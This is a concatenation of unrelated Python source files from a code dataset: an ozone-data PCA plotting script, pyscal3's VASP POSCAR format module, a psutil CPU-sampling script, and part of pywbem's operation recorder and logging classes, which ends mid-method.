    plt.legend(["winter", "spring", "summer", "fall"])
    plt.tight_layout()
    plt.show()
    ### plot for pca contribution (loadings per feature) ###
    fig, ax = plt.subplots(figsize=(14, 8))
    for i in range(max_pca):
        ax.plot(data_pca.columns, V_real[:,i], label=f'Component {i + 1}', marker='o')
    for i in range(max_pca):
        print(V_real[:,i])
    ax.set_xticks(data_pca.columns)
    ax.set_xticklabels(data_pca.columns, rotation=45)
    ax.set_ylabel('Loading')
    ax.set_title('PCA Component Loadings for Each Feature')
    ax.grid(True)
    plt.show()
    ### pca loadings heatmap ###
    fig, ax = plt.subplots(figsize=(14, 8))
    im = ax.imshow(V_real[:,0:max_pca], cmap="RdBu")
    ax.legend()
    plt.colorbar(im)
    ax.set_yticks(np.arange(len(data_pca.columns)), labels=data_pca.columns)
    ax.set_xticks(np.arange(max_pca), labels=np.arange(max_pca)+1)
    ax.set_ylabel('Feature')
    ax.set_xlabel('PCA component')
    ax.set_title('PCA Component Loadings for Each Feature')
    plt.show()
def main():
    """
    Entry point: load the LA ozone data, derive a categorical 'season'
    column from the day-of-year ('doy') column, then run the summary
    statistics, visualisation and PCA steps.
    """
    ### load data ###
    data_path = os.path.join(os.getcwd(), "LAozone.csv")
    data = pd.read_csv(data_path)
    ### add additional feature: season decoded from doy ###
    # 0 = winter (december, january, february)
    # 1 = spring (march, april, may)
    # 2 = summer (june, july, august)
    # 3 = autumn (september, october, november)
    # BUGFIX: the original used chained indexing (data["season"][row] = ...),
    # which raises SettingWithCopyWarning and is not guaranteed to write back;
    # vectorized .loc assignment is both correct and faster.
    doy = data["doy"]
    data["season"] = 0  # default covers doy <= 60 or doy > 335 (winter)
    data.loc[(doy > 60) & (doy <= 152), "season"] = 1
    data.loc[(doy > 152) & (doy <= 244), "season"] = 2
    data.loc[(doy > 244) & (doy <= 335), "season"] = 3
    inspect_data(data)
    data_visualisation(data)
    pca(data)

if __name__ == "__main__":
    main()
| tirohweder/into_ml_dm_project_1 | main.py | main.py | py | 11,707 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "warnings.filterwarnings",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "matplotlib.MatplotlibDeprecationWarning",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 39,
"usage_type": "call"
},
{
... |
40746622543 | import numpy as np
import gzip
from ase import Atom, Atoms
import gzip
import io
import os
from ase.io import write, read
import pyscal3.formats.ase as ptase
import warnings
def read_snap(infile, compressed = False):
    """
    Read a POSCAR (VASP) format file through the ASE backend and convert
    the result to pyscal structures.

    Parameters
    ----------
    infile : string
        name of the input file
    compressed : bool, optional
        force to read a `gz` zipped file. If the filename ends with `.gz`, use of this keyword is not
        necessary, Default False
        NOTE(review): this flag is currently unused in the body — reading is
        delegated entirely to ase.io.read; confirm gz handling is done by ASE.

    Returns
    -------
    atoms : list of `Atom` objects
        list of all atoms as created by user input
    box : list of list of floats
        list of the type `[[xlow, xhigh], [ylow, yhigh], [zlow, zhigh]]` where each of them are the lower
        and upper limits of the simulation box in x, y and z directions respectively.

    Examples
    --------
    >>> atoms, box = read_poscar('POSCAR')
    >>> atoms, box = read_poscar('POSCAR.gz')
    >>> atoms, box = read_poscar('POSCAR.dat', compressed=True)
    """
    # parse with ASE, then convert the ASE Atoms object into pyscal atoms/box
    aseobj = read(infile, format="vasp")
    atoms, box = ptase.read_snap(aseobj)
    return atoms, box
def write_snap(sys, outfile, comments="pyscal", species=None):
    """
    Write a pyscal System to a POSCAR (VASP) file.

    When ``species`` is supplied the system is converted to an ASE Atoms
    object and written through ASE; otherwise the legacy internal POSCAR
    writer is used and a warning is emitted.
    """
    if species is not None:
        aseobj = ptase.convert_snap(sys, species=species)
        write(outfile, aseobj, format="vasp")
        return
    warnings.warn("Using legacy poscar writer, to use ASE backend specify species")
    write_poscar(sys, outfile, comments=comments)
def split_snaps(**kwargs):
    """Splitting trajectories is not supported for the VASP backend."""
    # BUGFIX: the message used to say "mdtraj" — copy-paste from another
    # format module; this is the vasp backend.
    raise NotImplementedError("split method for vasp is not implemented")


def convert_snap(**kwargs):
    """Snapshot conversion is not supported for the VASP backend."""
    raise NotImplementedError("convert method for vasp is not implemented")
def write_poscar(sys, outfile, comments="pyscal", species=None):
    """
    Write a pyscal System to a VASP POSCAR file (legacy pure-python writer).

    Parameters
    ----------
    sys : System
        system whose box and atom positions are written

    outfile : string
        name of the output file

    comments : string, optional
        comment placed on the first line of the POSCAR file

    species : list of str, optional
        species names indexed by ``type - 1``; required when the system does
        not already carry per-atom species information.

    Raises
    ------
    ValueError
        if species information is neither stored on the system nor supplied,
        or if ``species`` does not match the number of atom types.
    """
    # Ensure a per-atom species list exists (filled with None when unknown).
    if 'species' not in sys.atoms.keys():
        sys.atoms["species"] = [None for x in range(sys.atoms.ntotal)]

    if sys.atoms.species[0] is None:
        # BUGFIX: `species` was an undefined name here (NameError on the
        # legacy path reached via write_snap); it is now a keyword argument
        # so numeric types can be mapped to species strings.
        if species is None:
            raise ValueError("Species was not known! To convert to ase, species need to be provided using the species keyword")
        types = sys.atoms.types
        unique_types = np.unique(types)
        if not (len(unique_types) == len(species)):
            raise ValueError("Length of species and number of types found in system are different. Maybe you specified \"Au\" instead of [\"Au\"]")
        # types are 1-based; map each to its species string
        atomspecies = [species[int(typ - 1)] for typ in types]
    else:
        atomspecies = sys.atoms.species

    # `with` guarantees the file is closed even if a write fails
    # (the original leaked the handle on error).
    with open(outfile, 'w') as fout:
        fout.write(comments + "\n")
        fout.write(" 1.00000000000000\n")

        # box vectors, one row per lattice vector
        vecs = sys.box
        fout.write(" %1.14f %1.14f %1.14f\n" % (vecs[0][0], vecs[0][1], vecs[0][2]))
        fout.write(" %1.14f %1.14f %1.14f\n" % (vecs[1][0], vecs[1][1], vecs[1][2]))
        fout.write(" %1.14f %1.14f %1.14f\n" % (vecs[2][0], vecs[2][1], vecs[2][2]))

        # group atom positions by species so the counts line matches the
        # per-species position blocks that follow
        tt, cc = np.unique(atomspecies, return_counts=True)
        atomgroups = [[] for x in range(len(tt))]
        for count, t in enumerate(tt):
            for ccount, pos in enumerate(sys.atoms.positions):
                if atomspecies[ccount] == t:
                    atomgroups[count].append(pos)

        fout.write(" ")
        for c in cc:
            fout.write("%d " % int(c))
        fout.write("\n")

        fout.write("Cartesian\n")
        for group in atomgroups:
            for pos in group:
                fout.write(" %1.14f %1.14f %1.14f\n" % (pos[0], pos[1], pos[2]))
| pyscal/pyscal3 | src/pyscal3/formats/vasp.py | vasp.py | py | 3,869 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "ase.io.read",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "pyscal3.formats.ase.read_snap",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "pyscal3.formats.ase",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "warning... |
11686617200 | import psutil
import time
import sys
# Nav : gzserver, move_base, amcl, robo state pub, rosout, mapsrv
# ObjTrack : gzserver, subscribr, objdetector, objtracker, controller
# Nav2D : stage, navigator, operator, mapper, rviz, joy, controller
# Per-process utilisation accumulators (8 slots); NOTE(review): only slot 0
# is ever filled by get_cpu_mem_nav2d, and mem_util is never updated at all
# — presumably leftovers from the multi-node variants listed above. Confirm.
cpu_util = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
mem_util = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
print(sys.argv)
# t = int(sys.argv[1])
# freq = int(sys.argv[2])
# tim = int(sys.argv[3])
# r = int(sys.argv[5])
# Sampling period in seconds between CPU measurements.
sleep_time = 0.4
# n_o = tim/sleep_time
# Number of samples taken so far (used to average the accumulators).
count = 0
def is_illixr_proc(proc) -> bool:
    """Return True if *proc* looks like the ILLIXR runtime executable.

    A process can disappear or become a zombie between enumeration by
    ``psutil.process_iter()`` and the ``exe()`` call; previously only
    ``AccessDenied`` was handled, so a short-lived process crashed the
    sampler with ``NoSuchProcess``. All three cases are now treated as
    "not our process".
    """
    try:
        exe = proc.exe()
    except (psutil.AccessDenied, psutil.NoSuchProcess, psutil.ZombieProcess):
        # unreadable or already-gone process — cannot be ours
        exe = ""
    return "main.opt.exe" in exe
def is_running():
    """Return True while at least one ILLIXR process is alive."""
    for candidate in psutil.process_iter():
        if is_illixr_proc(candidate):
            return True
    return False
def get_cpu_mem_nav2d():
    # Accumulate the CPU utilisation of every ILLIXR process into the first
    # slot of the global `cpu_util` list. NOTE(review): the remaining slots
    # and all of `mem_util` are never written here — verify whether memory
    # sampling was intentionally dropped.
    for proc in filter(is_illixr_proc, psutil.process_iter()):
        cpu_util[0] += proc.cpu_percent()
# Collected progress strings, echoed again in the final report.
ts_arr = []

# Block until the first ILLIXR process appears.
while not is_running():
    time.sleep(0.01)
print("Detected process launch")

# Sample CPU usage for as long as the workload is alive.
# (Indentation reconstructed — source was whitespace-stripped; TODO confirm
# the loop extent against the original repository.)
while is_running():
    get_cpu_mem_nav2d()
    count += 1
    # print once every 10s i.e. 25*0.4s.
    if (count % 25 == 15):
        cpu = [x/count for x in cpu_util]
        mem = [x/count for x in mem_util]
        cms = "###Count: " + str(count) + "Avg CPU: " + str(cpu) + ", Mem: " + str(mem)
        print(cms)
        ts_arr.append(cms)
    time.sleep(sleep_time)
print("ADDED all observations", count)

# Convert the accumulators into per-sample averages and a printable report.
cpu_txt = ""
mem_txt = ""
for i in range(len(cpu_util)):
    cpu_util[i] /= count
    cpu_txt += str(cpu_util[i]) + ", "
    mem_util[i] /= count
    mem_txt += str(mem_util[i]) + ", "

# fname = "%s_cpu_mem.txt"% (sys.argv[4])
# Report goes to stdout (a file sink is commented out below).
f = sys.stdout
# f = open(fname, "w")
for i in sys.argv:
    f.write(i + ", ")
for j in ts_arr:
    f.write(j)
f.write("\n")
f.write(str(count) + ", ")
f.write(cpu_txt)
f.write(mem_txt)
f.write("\n")
print(sys.argv)
print(cpu_util)
print(mem_util)
'''
if sys.argv[8] == 'yes':
with open('cpu_time_series_%s_%s%s.txt'% (sys.argv[3], sys.argv[4], sys.argv[9]), 'a') as fw:
print "Writing to file for ", sys.argv[3], sys.argv[4], sys.argv[9]
for i in move_base_cpu_arr:
fw.write(str(i) + ', ')
fw.write('\n')
for i in amcl_cpu_arr:
fw.write(str(i) + ', ')
fw.write('\n')
'''
| aditi741997/robotics_project | measure_cpu.py | measure_cpu.py | py | 2,264 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.argv",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "psutil.AccessDenied",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "psutil.process_iter",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "psutil.pro... |
18626454048 | #
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
"""
Operation recorder interface and implementations.
"""
from __future__ import print_function, absolute_import
from collections import namedtuple
try:
from collections import OrderedDict # pylint: disable=import-error
except ImportError:
from ordereddict import OrderedDict # pylint: disable=import-error
from datetime import datetime, timedelta
import logging
import yaml
from yaml.representer import RepresenterError
import six
from .cim_obj import CIMInstance, CIMInstanceName, CIMClass, CIMClassName, \
CIMProperty, CIMMethod, CIMParameter, CIMQualifier, \
CIMQualifierDeclaration, NocaseDict
from .cim_types import CIMInt, CIMFloat, CIMDateTime
from .exceptions import CIMError
from ._logging import PywbemLoggers, LOG_OPS_CALLS_NAME, LOG_HTTP_NAME
from .config import DEFAULT_MAX_LOG_ENTRY_SIZE
if six.PY2:
import codecs # pylint: disable=wrong-import-order
__all__ = ['BaseOperationRecorder', 'TestClientRecorder',
'LogOperationRecorder',
'OpArgs', 'OpResult', 'HttpRequest', 'HttpResponse']
if six.PY2:
_Longint = long # noqa: F821
else:
_Longint = int
OpArgsTuple = namedtuple("OpArgsTuple", ["method", "args"])
def _represent_ordereddict(dump, tag, mapping, flow_style=None):
    """PyYAML representer function for OrderedDict.

    This is needed for yaml.safe_dump() to support OrderedDict while
    preserving key order (the default mapping representer sorts keys).

    Courtesy:
    http://blog.elsdoerfer.name/2012/07/26/make-pyyaml-output-an-ordereddict/
    """
    value = []
    node = yaml.MappingNode(tag, value, flow_style=flow_style)
    # Register the node for alias/anchor resolution before recursing.
    if dump.alias_key is not None:
        dump.represented_objects[dump.alias_key] = node
    best_style = True
    if hasattr(mapping, 'items'):
        mapping = mapping.items()
    for item_key, item_value in mapping:
        node_key = dump.represent_data(item_key)
        node_value = dump.represent_data(item_value)
        # Flow style is only "best" when every key and value is a plain
        # (unstyled) scalar; any complex member forces block style.
        if not (isinstance(node_key, yaml.ScalarNode) and
                not node_key.style):
            best_style = False  # pylint: disable=bad-indentation
        if not (isinstance(node_value, yaml.ScalarNode) and
                not node_value.style):
            best_style = False  # pylint: disable=bad-indentation
        value.append((node_key, node_value))
    # Honour an explicit flow_style, then the dumper default, then best_style.
    if flow_style is None:
        if dump.default_flow_style is not None:
            node.flow_style = dump.default_flow_style
        else:
            node.flow_style = best_style
    return node
# Teach yaml.safe_dump how to serialise OrderedDict (used for the ordered
# testcase output produced by TestClientRecorder).
yaml.SafeDumper.add_representer(
    OrderedDict,
    lambda dumper, value:
    _represent_ordereddict(dumper, u'tag:yaml.org,2002:map', value))


# Some monkey-patching for better diagnostics:
def _represent_undefined(self, data):
    """Raises flag for objects that cannot be represented"""
    # Include the registered representers in the message so a missing
    # toyaml() conversion is easy to diagnose.
    raise RepresenterError("cannot represent an object: %s of type: %s; "
                           "yaml_representers: %r, "
                           "yaml_multi_representers: %r" %
                           (data, type(data), self.yaml_representers.keys(),
                            self.yaml_multi_representers.keys()))


# Replace PyYAML's default "cannot represent" handler with the verbose one.
yaml.SafeDumper.represent_undefined = _represent_undefined
class OpArgs(OpArgsTuple):
    """
    Named tuple describing one :class:`~pywbem.WBEMConnection` method
    invocation, with the following fields:

    Attributes:

      method (:term:`unicode string`):
        Name of the :class:`~pywbem.WBEMConnection` method.

      args (:class:`py:dict`):
        Dictionary of input arguments (both positional and keyword-based).
    """

    __slots__ = ()

    def __repr__(self):
        return "OpArgs(method={0!r}, args={1!r})".format(self.method,
                                                         self.args)
OpResultTuple = namedtuple("OpResultTuple", ["ret", "exc"])


class OpResult(OpResultTuple):
    """
    Named tuple describing the result of a :class:`~pywbem.WBEMConnection`
    method invocation, with the following fields:

    Attributes:

      ret (:class:`py:object`):
        Return value when the method returned; `None` when it raised.
        Since `None` is also a legitimate return value, test :attr:`exc`
        to distinguish the two cases.

      exc (:exc:`~py:exceptions.Exception`):
        Exception object when the method raised; `None` when it returned.
    """

    __slots__ = ()

    def __repr__(self):
        return "OpResult(ret={0!r}, exc={1!r})".format(self.ret, self.exc)
HttpRequestTuple = namedtuple(
    "HttpRequestTuple",
    ["version", "url", "target", "method", "headers", "payload"])


class HttpRequest(HttpRequestTuple):
    """
    Named tuple describing the HTTP request sent by the WBEM client, with
    the following fields:

    Attributes:

      version (:term:`number`):
        HTTP version from the request line (10 for HTTP/1.0, 11 for HTTP/1.1).

      url (:term:`unicode string`):
        URL of the WBEM server (e.g. 'https://myserver.acme.com:15989').

      target (:term:`unicode string`):
        Target URL segment as stated in request line (e.g. '/cimom').

      method (:term:`unicode string`):
        HTTP method as stated in the request line (e.g. "POST").

      headers (:class:`py:dict`):
        Dictionary of HTTP header fields (name -> value).

      payload (:term:`unicode string`):
        HTTP payload, i.e. the CIM-XML string.
    """

    __slots__ = ()

    def __repr__(self):
        parts = ("HttpRequest(version={0!r}, url={1!r}, target={2!r}, "
                 "method={3!r}, headers={4!r}, payload={5!r})")
        return parts.format(self.version, self.url, self.target,
                            self.method, self.headers, self.payload)
HttpResponseTuple = namedtuple(
    "HttpResponseTuple",
    ["version", "status", "reason", "headers", "payload"])


class HttpResponse(HttpResponseTuple):
    """
    Named tuple describing the HTTP response received by the WBEM client,
    with the following fields:

    Attributes:

      version (:term:`number`):
        HTTP version from the response line (10 for HTTP/1.0, 11 for HTTP/1.1).

      status (:term:`number`):
        HTTP status code from the response line (e.g. 200).

      reason (:term:`unicode string`):
        HTTP reason phrase from the response line (e.g. "OK").

      headers (:class:`py:dict`):
        Dictionary of HTTP header fields (name -> value).

      payload (:term:`unicode string`):
        HTTP payload, i.e. the CIM-XML string.
    """

    __slots__ = ()

    def __repr__(self):
        parts = ("HttpResponse(version={0!r}, status={1!r}, reason={2!r}, "
                 "headers={3!r}, payload={4!r})")
        return parts.format(self.version, self.status, self.reason,
                            self.headers, self.payload)
class BaseOperationRecorder(object):
    # pylint: disable=too-many-instance-attributes
    """
    Abstract base class defining the interface to an operation recorder,
    that records the WBEM operations executed in a connection to a WBEM
    server.

    An operation recorder can be registered by setting the
    :attr:`~pywbem.WBEMConnection.operation_recorder` instance
    attribute of the :class:`~pywbem.WBEMConnection` object to an
    object of a subclass of this base class.

    When an operation recorder is registered on a connection, each operation
    that is executed on the connection will cause the :meth:`record`
    method of the operation recorder object to be called, if the recorder is
    enabled.

    The operation recorder is by default enabled, and can be disabled and
    re-enabled using the :meth:`~pywbem.BaseOperationRecorder.disable` and
    :meth:`~pywbem.BaseOperationRecorder.enable` methods, respectively.
    This can be used to temporarily pause the recorder.

    Usage protocol (as exercised by WBEMConnection): the connection calls the
    ``stage_*`` methods as information becomes available during one
    operation, then :meth:`record_staged` assembles the staged pieces and
    forwards them to the subclass's :meth:`record`.
    """

    def __init__(self):
        self._enabled = True
        self._conn_id = None
        self.reset()

    def enable(self):
        """Enable the recorder."""
        self._enabled = True

    def disable(self):
        """Disable the recorder."""
        self._enabled = False

    @property
    def enabled(self):
        """Indicate whether the recorder is enabled."""
        return self._enabled

    @staticmethod
    def open_file(filename, file_mode='w'):
        """
        A static convenience function that performs the open of the recorder
        file correctly for different versions of python. This covers the
        issue where the file should be opened in text mode but that is
        done differently in python 2 and python 3.

        Parameters:

          filename(:term:`string`):
            Name of the file where the recorder output will be written

          file_mode(:term:`string`):
            Optional file mode. The default is 'w' which overwrites any
            existing file. if 'a' is used, the data is appended to any
            existing file.

        Example::

            recorder = TestClientRecorder(
                BaseOperationRecorder.open_file('recorder.log'))
        """
        if six.PY2:
            # Open with codecs to define text mode
            return codecs.open(filename, mode=file_mode, encoding='utf-8')
        return open(filename, file_mode, encoding='utf8')

    def reset(self, pull_op=None):
        """Reset all the attributes in the class. This also allows setting
        the pull_op attribute that defines whether the operation is to be
        a traditional or pull operation.

        This does NOT reset _conn.id as that exists through the life of
        the connection.
        """
        self._pywbem_method = None
        self._pywbem_args = None
        self._pywbem_result_ret = None
        self._pywbem_result_exc = None
        self._http_request_version = None
        self._http_request_url = None
        self._http_request_target = None
        self._http_request_method = None
        self._http_request_headers = None
        self._http_request_payload = None
        self._http_response_version = None
        self._http_response_status = None
        self._http_response_reason = None
        self._http_response_headers = None
        self._http_response_payload = None
        self._pull_op = pull_op

    def stage_wbem_connection(self, wbem_connection):
        """
        Stage information about the connection. Used only by
        LogOperationRecorder.
        """
        pass

    def stage_pywbem_args(self, method, **kwargs):
        """
        Set request method and all args.
        Normally called before the cmd is executed to record request
        parameters.
        """
        # pylint: disable=attribute-defined-outside-init
        self._pywbem_method = method
        self._pywbem_args = kwargs

    def stage_pywbem_result(self, ret, exc):
        """Set Result return info or exception info"""
        # pylint: disable=attribute-defined-outside-init
        self._pywbem_result_ret = ret
        self._pywbem_result_exc = exc

    def stage_http_request(self, conn_id, version, url, target, method, headers,
                           payload):
        """Set request HTTP information including url, headers, etc."""
        # pylint: disable=attribute-defined-outside-init
        self._http_request_version = version
        self._http_request_conn_id = conn_id
        self._http_request_url = url
        self._http_request_target = target
        self._http_request_method = method
        self._http_request_headers = headers
        self._http_request_payload = payload

    # pylint: disable=unused-argument
    def stage_http_response1(self, conn_id, version, status, reason, headers):
        """Set response http info including headers, status, etc.
        conn_id unused here. Used in log"""
        # pylint: disable=attribute-defined-outside-init
        self._http_response_version = version
        self._http_response_status = status
        self._http_response_reason = reason
        self._http_response_headers = headers

    def stage_http_response2(self, payload):
        """Stage second part of http response, the payload"""
        # pylint: disable=attribute-defined-outside-init
        self._http_response_payload = payload

    def record_staged(self):
        """Encode staged information on request and result to output"""
        if self.enabled:
            # Bundle the staged fragments into the four named tuples that
            # record() expects.
            pwargs = OpArgs(
                self._pywbem_method,
                self._pywbem_args)
            pwresult = OpResult(
                self._pywbem_result_ret,
                self._pywbem_result_exc)
            httpreq = HttpRequest(
                self._http_request_version,
                self._http_request_url,
                self._http_request_target,
                self._http_request_method,
                self._http_request_headers,
                self._http_request_payload)
            httpresp = HttpResponse(
                self._http_response_version,
                self._http_response_status,
                self._http_response_reason,
                self._http_response_headers,
                self._http_response_payload)
            self.record(pwargs, pwresult, httpreq, httpresp)

    def record(self, pywbem_args, pywbem_result, http_request, http_response):
        """
        Function that is called to record a single WBEM operation, i.e. the
        invocation of a single :class:`~pywbem.WBEMConnection` method.

        This function is called only when the recorder is enabled, i.e. it
        does not need to check for recorder enablement.

        Parameters:

          pywbem_args (:class:`~pywbem.OpArgs`):
            The name and input arguments of the :class:`~pywbem.WBEMConnection`
            method that is recorded.

          pywbem_result (:class:`~pywbem.OpResult`):
            The result (return value or exception) of the
            :class:`~pywbem.WBEMConnection` method that is recorded.

          http_request (:class:`~pywbem.HttpRequest`):
            The HTTP request sent by the :class:`~pywbem.WBEMConnection` method
            that is recorded.
            `None`, if no HTTP request had been sent (e.g. because an exception
            was raised before getting there).

          http_response (:class:`~pywbem.HttpResponse`):
            The HTTP response received by the :class:`~pywbem.WBEMConnection`
            method that is recorded.
            `None`, if no HTTP response had been received (e.g. because an
            exception was raised before getting there).
        """
        raise NotImplementedError
class LogOperationRecorder(BaseOperationRecorder):
    """
    An Operation Recorder that logs the information to a set of named logs.
    This recorder uses two named logs:

    LOG_OPS_CALLS_NAME - Logger for cim_operations method calls and responses

    LOG_HTTP_NAME - Logger for http_requests and responses

    This also implements a method to log information on each connection.

    All logging calls are at the debug level.
    """

    def __init__(self, max_log_entry_size=None):
        """
        Creates the loggers and sets the max_log_size for each if
        the input parameter max_log_entry_size is not `None`.

        Parameters:

          max_log_entry_size(:term:`integer`)
            The maximum size of each log entry. This is primarily to limit
            response sizes since they could be enormous.

            If `None`, no size limit and the full request or response is
            logged.
        """
        super(LogOperationRecorder, self).__init__()
        # compute max entry size for each logger; truncation only applies
        # when the logger's configured detail level is 'min'
        max_sz = max_log_entry_size if max_log_entry_size \
            else DEFAULT_MAX_LOG_ENTRY_SIZE
        self.opslogger = logging.getLogger(LOG_OPS_CALLS_NAME)
        ops_logger_info = PywbemLoggers.get_logger_info(LOG_OPS_CALLS_NAME)
        opsdetaillevel = ops_logger_info[0] if ops_logger_info else None
        self.ops_max_log_size = max_sz if opsdetaillevel == 'min' \
            else None
        self.httplogger = logging.getLogger(LOG_HTTP_NAME)
        http_logger_info = PywbemLoggers.get_logger_info(LOG_HTTP_NAME)
        httpdetaillevel = http_logger_info[0] if http_logger_info else None
        self.http_max_log_size = max_sz if httpdetaillevel == 'min' \
            else None

    def stage_wbem_connection(self, wbem_connection):
        """
        Log connection information. This includes the connection id
        that should remain through the life of the connection.
        """
        self._conn_id = wbem_connection.conn_id
        if self.enabled:
            self.opslogger.debug('Connection:%s %r', self._conn_id,
                                 wbem_connection)

    def stage_pywbem_args(self, method, **kwargs):
        """
        Log request method and all args.
        Normally called before the cmd is executed to record request
        parameters.
        This method does not limit size of log record.
        """
        # pylint: disable=attribute-defined-outside-init
        self._pywbem_method = method
        if self.enabled and self.opslogger.isEnabledFor(logging.DEBUG):
            # Order kwargs. Note that this is done automatically starting
            # with python 3.6
            kwstr = ', '.join([('{0}={1!r}'.format(key, kwargs[key]))
                               for key in sorted(six.iterkeys(kwargs))])
            self.opslogger.debug('Request:%s %s(%s)', self._conn_id, method,
                                 kwstr)

    def stage_pywbem_result(self, ret, exc):
        """
        Log result return or exception parameter. This function allows
        setting maximum size on the result parameter logged because response
        information can be very large.
        """
        def format_result(ret, max_len):
            """ format ret as repr while clipping it to max_len if
            max_len is not None.
            """
            result = '{0!r}'.format(ret)
            if max_len and (len(result) > max_len):
                result = (result[:max_len] + '...')
            return result

        if self.enabled and self.opslogger.isEnabledFor(logging.DEBUG):
            if exc:  # format exception
                result = format_result(
                    '%s(%s)' % (exc.__class__.__name__, exc),
                    self.ops_max_log_size)
            else:  # format result
                # test if type is tuple (subclass of tuple but not type tuple)
                # i.e. one of the pull-operation result named tuples
                # pylint: disable=unidiomatic-typecheck
                if isinstance(ret, tuple) and \
                        type(ret) is not tuple:  # pylint: disable=C0123
                    try:  # test if field instances or paths
                        rtn_data = ret.instances
                        data_str = 'instances'
                    except AttributeError:
                        rtn_data = ret.paths
                        data_str = 'paths'
                    rtn_data = format_result(rtn_data, self.ops_max_log_size)
                    try:  # test for query_result_class
                        qrc = ', query_result_class=%s' % ret.query_result_class
                    except AttributeError:
                        qrc = ""
                    result = "{0.__name__}(context={1}, eos={2}{3}, {4}={5})" \
                        .format(type(ret), ret.context, ret.eos, qrc,
                                data_str, rtn_data)
                else:
                    result = format_result(ret, self.ops_max_log_size)
            return_type = 'Exception' if exc else 'Return'
            self.opslogger.debug('%s:%s %s(%s)', return_type, self._conn_id,
                                 self._pywbem_method,
                                 result)

    def stage_http_request(self, conn_id, version, url, target, method, headers,
                           payload):
        """Log request HTTP information including url, headers, etc."""
        if self.enabled and self.httplogger.isEnabledFor(logging.DEBUG):
            # pylint: disable=attribute-defined-outside-init
            # if Auth header, mask data
            # NOTE(review): this mutates the caller's headers dict in place,
            # so the masked credential is what gets sent/kept downstream —
            # confirm this is intended.
            if 'Authorization' in headers:
                authtype, cred = headers['Authorization'].split(' ')
                headers['Authorization'] = '%s %s' % (authtype, 'X' * len(cred))
            header_str = ' '.join('{0}:{1!r}'.format(k, v)
                                  for k, v in headers.items())
            self.httplogger.debug('Request:%s %s %s %s %s %s\n    %s',
                                  conn_id, method, target, version, url,
                                  header_str, payload)

    def stage_http_response1(self, conn_id, version, status, reason, headers):
        """Set response http info including headers, status, etc. """
        # pylint: disable=attribute-defined-outside-init
        self._http_response_version = version
        self._http_response_status = status
        self._http_response_reason = reason
        self._http_response_headers = headers
        self._http_response_conn_id = conn_id

    def stage_http_response2(self, payload):
        """Log complete http response, including response1 and payload"""
        # required because http code uses sending all None to reset
        # parameters. We ignore that
        if not self._http_response_version and not payload:
            return
        if self.enabled and self.httplogger.isEnabledFor(logging.DEBUG):
            if self._http_response_headers:
                header_str = \
                    ' '.join('{0}:{1!r}'.format(k, v)
                             for k, v in self._http_response_headers.items())
            else:
                header_str = ''
            # format the payload possibly with max size limit
            payload = '%r' % payload.decode('utf-8')
            if self.http_max_log_size and \
                    (len(payload) > self.http_max_log_size):
                payload = (payload[:self.http_max_log_size] + '...')
            self.httplogger.debug('Response:%s %s:%s %s %s\n    %s',
                                  self._http_response_conn_id,
                                  self._http_response_status,
                                  self._http_response_reason,
                                  self._http_response_version,
                                  header_str,
                                  payload)

    def record_staged(self):
        """Not used for logging"""
        pass

    def record(self, pywbem_args, pywbem_result, http_request, http_response):
        """Not used for logging"""
        pass
class TestClientRecorder(BaseOperationRecorder):
    """
    An operation recorder that generates test cases for each recorded
    operation. The test cases are in the YAML format suitable for the
    `test_client` unit test module of the pywbem project.
    """

    # HTTP header fields to exclude when creating the testcase
    # (in lower case)
    EXCLUDE_REQUEST_HEADERS = [
        'authorization',
        'content-length',
        'content-type',
    ]
    EXCLUDE_RESPONSE_HEADERS = [
        'content-length',
        'content-type',
    ]

    # Dummy server URL and credentials for use in generated test case
    TESTCASE_URL = 'http://acme.com:80'
    TESTCASE_USER = 'username'
    TESTCASE_PASSWORD = 'password'

    def __init__(self, fp):
        """
        Parameters:

          fp (file):
            An open file that each test case will be written to. This file
            should have been opened in text mode.

            Since there are differences between python 2 and 3 in opening
            files in text mode, the static method
            :meth:`~pywbem.BaseOperationRecorder.open_file`
            can be used to open the file or python 2/3 compatible open::

                from io import open
                f = open('blah.log', encoding='utf-8')

        Example::

            recorder = TestClientRecorder(
                BaseOperationRecorder.open_file('recorder.log'))
        """
        super(TestClientRecorder, self).__init__()
        self._fp = fp

    def record(self, pywbem_args, pywbem_result, http_request, http_response):
        """
        Function that records the invocation of a single
        :class:`~pywbem.WBEMConnection` method, by appending a corresponding
        test case to the file.

        Parameters: See :meth:`pywbem.BaseOperationRecorder.record`.
        """
        testcase = OrderedDict()
        testcase['name'] = pywbem_args.method
        testcase['description'] = 'Generated by TestClientRecorder'

        # pywbem_request section: dummy connection parameters plus the
        # recorded operation name and YAML-converted arguments.
        tc_pywbem_request = OrderedDict()
        tc_pywbem_request['url'] = TestClientRecorder.TESTCASE_URL
        tc_pywbem_request['creds'] = [TestClientRecorder.TESTCASE_USER,
                                      TestClientRecorder.TESTCASE_PASSWORD]
        tc_pywbem_request['namespace'] = 'root/cimv2'
        tc_pywbem_request['timeout'] = 10
        tc_pywbem_request['debug'] = False
        tc_operation = OrderedDict()
        tc_operation['pywbem_method'] = pywbem_args.method
        for arg_name in pywbem_args.args:
            tc_operation[arg_name] = self.toyaml(pywbem_args.args[arg_name])
        tc_pywbem_request['operation'] = tc_operation
        testcase['pywbem_request'] = tc_pywbem_request

        # pywbem_response section: result, CIM status or exception name.
        tc_pywbem_response = OrderedDict()
